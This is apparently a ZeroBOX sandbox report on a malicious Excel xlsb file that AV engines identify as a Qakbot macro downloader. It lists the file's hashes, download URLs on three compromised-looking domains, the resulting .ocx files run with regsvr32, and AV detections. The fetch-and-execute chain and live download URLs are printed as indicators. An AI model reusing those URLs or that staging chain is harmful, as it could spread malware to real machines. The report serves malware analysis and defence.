Favorites
Tools
Dr.Zero Chatbot
Notifications
Guide 2020-06-10
Version history 2020-06-10

latestReport
10.05 02:10
mime-attachment 2
10.05 11:10
66fffb908255c_nnxin.exe
10.05 11:10
66fe13d56fd43_EdgeOUpd...
10.05 11:10
9dd06d870941.exe#d15
10.05 11:10
7f3c2473d1e6.exe#sp_vid
10.05 11:10
f2e7fcb20146.exe#sp_sl
10.05 11:10
956d73b7f041.exe#defau...
10.05 09:10
payload.msi
10.05 09:10
fedf8679e8d2.exe#d12
10.05 09:10
segura.vbs

Latest News
10.05 04:10
Clone of TEST BLOG WIL...
10.05 03:10
Anzeige: So gelingt di...
10.05 03:10
KI verstehen mit Excel...
10.05 03:10
Apple Releases Critica...
10.05 02:10
Mechanical Switch Sci-...
10.05 11:10
This Bluetooth GATT Co...
10.05 09:10
Mac Malware with L0Pse...
10.05 09:10
타이거다즐러, 올리브영 온라인몰 입점… ...
10.05 09:10
Ben Horowitz Will Dona...
10.05 09:10
5G-Ausbau: Zwei Bundes...

Summary | ZeroBOX

E-1253417553.xlsb

Malicious Library Excel Binary Workbook file format(xlsb)

Category	Machine	Started	Completed
FILE	s1_win7_x6402	April 13, 2022, 12:10 p.m.	April 13, 2022, 12:14 p.m.

Size	1.2MB
Type	Microsoft Excel 2007+
MD5	`c06fd22e66beb0fb9b58341480ae5f05`
SHA256	`a922f7119db11ccd5fd82dada8027bb11884d349074dcb1c0b7a62348e73454e`
CRC32	`F8026E72`
ssdeep	`24576:WRDb86nFSv/iMkSy6HYFb50ezNHICBWDxjTBPzC/eA3ctriSo+fTAzZK0jR4kye1:WR384SniMkSyWYFFbzedJTBPzcctS+f0`
Yara	xlsb - Excel Binary Workbook file format detection Malicious_Library_Zero - Malicious_Library

EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" C:\Users\test22\AppData\Local\Temp\E-1253417553.xlsb
2176
- regsvr32.exe regsvr32 /s C:\..\\Yhdthd.ocx
  2356
- regsvr32.exe regsvr32 /s C:\..\\Yhdthd1.ocx
  2424
- regsvr32.exe regsvr32 /s C:\..\\Yhdthd2.ocx
  2460

Name	Response	Post-Analysis Lookup
ateliecordefeltro.com	A 50.116.87.139	50.116.87.139
lojaalamar.com.br	A 192.185.216.64	192.185.216.64
amalalhamed.com	A 162.215.248.83	162.215.248.83

IP Address	Status	Action
162.215.248.83	Active	Moloch
164.124.101.2	Active	Moloch
192.185.216.64	Active	Moloch
50.116.87.139	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Performs some HTTP requests (3 events)

request	GET http://ateliecordefeltro.com/T9kpu5Vx0ag/Omnh.png7790983516.dat
request	GET http://lojaalamar.com.br/nokjRAAdeCA/Omnh.png7790983516.dat
request	GET http://amalalhamed.com/QOqUcVgYi9n/Omnh.png7790983516.dat

Allocates read-write-execute memory (usually to unpack itself) (3 events)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory April 13, 2022, 12:10 p.m.	process_identifier: 2176 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75260000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory April 13, 2022, 12:10 p.m.	process_identifier: 2176 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6b443000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory April 13, 2022, 12:10 p.m.	process_identifier: 2176 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003c4000 process_handle: 0xffffffff	1	0	0

Creates executable files on the filesystem (3 events)

file	Yhdthd2.ocx
file	Yhdthd.ocx
file	Yhdthd1.ocx

Creates hidden or system file (1 event)

Time & API	Arguments	Status	Return	Repeated
NtCreateFile April 13, 2022, 12:10 p.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x00000410 filepath: C:\Users\test22\AppData\Local\Temp\~$E-1253417553.xlsb desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES\|DELETE\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$E-1253417553.xlsb create_options: 4198496 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT\|FILE_DELETE_ON_CLOSE) status_info: 2 (FILE_CREATED) share_access: 1 (FILE_SHARE_READ)	1	0	0

Creates a suspicious process (3 events)

cmdline	regsvr32 /s C:\..\\Yhdthd.ocx
cmdline	regsvr32 /s C:\..\\Yhdthd1.ocx
cmdline	regsvr32 /s C:\..\\Yhdthd2.ocx

File has been identified by 14 AntiVirus engines on VirusTotal as malicious (14 events)

Sangfor	Malware.Generic-XLM.Save.ma35
Cyren	XF/SneakyBin.E.gen!Eldorado
Avast	VBS:Malware-gen
Kaspersky	HEUR:Trojan.MSOffice.Generic
Tencent	Trojan.MsOffice.Macro40.11003135
McAfee-GW-Edition	X97M/Downloader.lf
GData	Macro.Trojan-Downloader.Agent.BDH
Microsoft	TrojanDownloader:O97M/Qakbot.Y!MTB
ZoneAlarm	HEUR:Trojan.MSOffice.Generic
McAfee	X97M/Downloader.lf
Rising	Downloader.Agent/XLM!1.DD1F (CLASSIC)
Ikarus	Trojan-Downloader.XLM.Agent
Fortinet	MSExcel/Agent.BDH!tr
AVG	VBS:Malware-gen

Network communications indicative of a potential document or script payload download was initiated by the process excel.exe (3 events)

Time & API	Arguments	Status	Return	Repeated
URLDownloadToFileW April 13, 2022, 12:10 p.m.	url: http://ateliecordefeltro.com/T9kpu5Vx0ag/Omnh.png7790983516.dat stack_pivoted: 0 filepath_r: C:\..\\Yhdthd.ocx filepath: Yhdthd.ocx	1	0	0
URLDownloadToFileW April 13, 2022, 12:10 p.m.	url: http://lojaalamar.com.br/nokjRAAdeCA/Omnh.png7790983516.dat stack_pivoted: 0 filepath_r: C:\..\\Yhdthd1.ocx filepath: Yhdthd1.ocx	1	0	0
URLDownloadToFileW April 13, 2022, 12:10 p.m.	url: http://amalalhamed.com/QOqUcVgYi9n/Omnh.png7790983516.dat stack_pivoted: 0 filepath_r: C:\..\\Yhdthd2.ocx filepath: Yhdthd2.ocx	1	0	0

One or more non-whitelisted processes were created (3 events)

parent_process	excel.exe				martian_process	regsvr32 /s C:\..\\Yhdthd.ocx
parent_process	excel.exe				martian_process	regsvr32 /s C:\..\\Yhdthd1.ocx
parent_process	excel.exe				martian_process	regsvr32 /s C:\..\\Yhdthd2.ocx